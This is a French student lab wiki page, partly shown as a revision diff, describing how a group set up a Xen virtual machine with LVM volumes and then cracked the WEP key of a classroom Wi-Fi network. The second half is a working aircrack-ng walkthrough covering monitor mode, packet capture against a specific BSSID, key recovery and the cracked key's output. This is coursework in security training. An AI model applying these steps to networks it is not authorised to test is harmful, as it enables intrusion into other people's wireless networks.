TP sysres IMA2a5 2021/2022 G12 : Différence entre versions

De Wiki d'activités IMA
(Création machine virtuelle)
(Création machine virtuelle)
Ligne 58 : Ligne 58 :
  
  
Craquage clé WEP:
+
==
 +
Craquage clé WEP: ==
 +
 
  
 
Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01".
 
Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01".
Ligne 81 : Ligne 83 :
 
  Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
 
  Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
  
 +
La clé wifi est bien reconnue par le PC : Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
  
On réalise les commandes suivants :
+
On récupère le nom de l'interface de la clé Wifi :
  
  airmon -ng  
+
  airmon-ng  
  
PHOTO
 
  
On va renommer l'interface en wlan0, nous allons utiliser la commande suivante pour passer la carte Wifi en monitor :
+
On renomme l'interface en wlan0mon, nous allons utiliser la commande suivante pour passer la carte Wifi en monitor :
  
   airmon -ng start wlx40a5ef059e47
+
   airmon-ng start wlx40a5ef059e47
  
 
On va ensuite faire cette commande afin d'écouter les trames Wifi de la clé USB:
 
On va ensuite faire cette commande afin d'écouter les trames Wifi de la clé USB:
  
   airodump -ng wlan0
+
   airodump-ng wlan0mon
  
 
On obtient alors les informations suivantes :
 
On obtient alors les informations suivantes :
Ligne 101 : Ligne 103 :
 
  04:DA:D2:9C:50:50    -40          2      3      4        3      54e      WEP    WEP        cracotte01
 
  04:DA:D2:9C:50:50    -40          2      3      4        3      54e      WEP    WEP        cracotte01
  
On filtre notre interface :
+
On récupère dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte01 :  
 
 
BSSID                            PWR    RXQ  Beacons    #Data,  #/s      CH      MB      ENC    CIPHER  AUTH ESSID
 
04:DA:D2:9C:50:50    -42        10      30    19          4      3      54e    WEP    WEP    cracotte01
 
 
 
On lance l'interface dans ce terminal avec la commande suivante :
 
 
 
airodump -ng -c 3 --bssid 04:DA:D2:9C:50:50 wlan0
 
 
 
On va ouvrir un autre terminal et on lancera le cassage de la clé :
 
  
  airodump -ng /tmp/cracotte01-01.cap
+
airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:50 wlan0mon
  
On obtient :
+
On attends qu'il y ai au moins 30 000 trames récupérées puis on lance le crackage de la clé :
  
#   BSSID                              ESSID                    Encryption
+
   aircrack-ng lcrack-01.cap
1    04:DA:D2:9C:50:50        cracotte01            WEP (0 IVs)
 
  
 
Après 5-10min, on obtient le code de la clé Wifi :  
 
Après 5-10min, on obtient le code de la clé Wifi :  

Version du 29 novembre 2021 à 10:53


Création machine virtuelle

Dans un premier temps, on dois créer une machine virtuelle sur le serveur distant. On s'y connecte donc en tant que superuser :

 ssh -4 root@capbreton.plil.info

On créer alors la machine grâce à la commande qui suit :

 xen-create-image --force --hostname=Battlefield --ip=193.48.57.172 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster

La machine est alors créée sur capbreton. On passe à la configuration des disques, pour créer un RAID5 :

 lvcreate -L1G -n Battlefield1 virtual 
 lvcreate -L1G -n Battlefield2 virtual 
 lvcreate -L1G -n Battlefield3 virtual 
 lvcreate -L1G -n Battlefield4 virtual

On augmente ensuite la taille des 4 disques :

 lvextend -L +9G /dev/virtual/Battlefield1
 lvextend -L +9G /dev/virtual/Battlefield2
 lvextend -L +9G /dev/virtual/Battlefield3
 lvextend -L +9G /dev/virtual/Battlefield4


On vérifie que les disques sont bien installés :

 lvdisplay 

Détail d'un disque installé :

 --- Logical volume ---
 LV Path                /dev/virtual/Battlefield1
 LV Name                Battlefield1
 VG Name                virtual
 LV UUID                gvf9pC-5DAB-1YGt-fYJ1-ecrM-nZG2-ZFCf41
 LV Write Access        read/write
 LV Creation host, time capbreton, 2021-09-24 08:40:48 +0200
 LV Status              available
 # open                 0
 LV Size                10.00 GiB
 Current LE             2560
 Segments               2
 Allocation             inherit
 Read ahead sectors     auto
 - currently set to     256
 Block device           254:57

Puis on formate les disques :

mke2fs /dev/virtual/Battlefield1
mke2fs /dev/virtual/Battlefield2
mke2fs /dev/virtual/Battlefield3
mke2fs /dev/virtual/Battlefield4


== Craquage clé WEP: ==


Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01".

Tout d'abord, on installe l'utilitaire aircrack-ng

 su -
 apt install aircrack-ng

On prend une clé USB Wifi et on vérifie qu'elle est reconnue par l'ordinateur :

 lsusb
Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 413c:2005 Dell Computer Corp. RT7D50 Keyboard
Bus 001 Device 007: ID 413c:301a Dell Computer Corp. 
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

La clé wifi est bien reconnue par le PC : Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter

On récupère le nom de l'interface de la clé Wifi :

airmon-ng 


On renomme l'interface en wlan0mon, nous allons utiliser la commande suivante pour passer la carte Wifi en monitor :

 airmon-ng start wlx40a5ef059e47

On va ensuite faire cette commande afin d'écouter les trames Wifi de la clé USB:

 airodump-ng wlan0mon

On obtient alors les informations suivantes :

BSSID                 PWR     Beacons    #Data,   #/s      CH      MB      ENC     CIPHER   AUTH ESSID
04:DA:D2:9C:50:50     -40           2      3       4        3      54e      WEP     WEP         cracotte01

On récupère dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte01 :

airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:50 wlan0mon

On attends qu'il y ai au moins 30 000 trames récupérées puis on lance le crackage de la clé :

 aircrack-ng lcrack-01.cap

Après 5-10min, on obtient le code de la clé Wifi :

                                   Aircrack-ng 1.5.2 


                      [00:00:00] Tested 721 keys (got 665952 IVs)

  KB    depth   byte(vote)
   0    1/  2   27(703488) 1D(696832) 92(694528) EB(692224) A6(689408) 9D(688896) 
   1    2/  1   D0(698112) 65(697344) A7(696320) 0D(695296) 21(693504) 3A(692224) 
   2    1/  3   9B(701440) FC(697344) 2E(695808) 6D(692224) 57(689152) CF(688640) 
   3    1/  5   BB(703232) 30(700416) A6(699392) AB(699136) C2(696064) 36(695296) 
   4   13/  4   35(687104) D6(686592) 76(686080) 23(685824) 48(685824) 63(685568) 

            KEY FOUND! [ 12:34:56:78:9A:BC:02:CB:A9:87:65:43:21 ] 

Decrypted correctly: 100%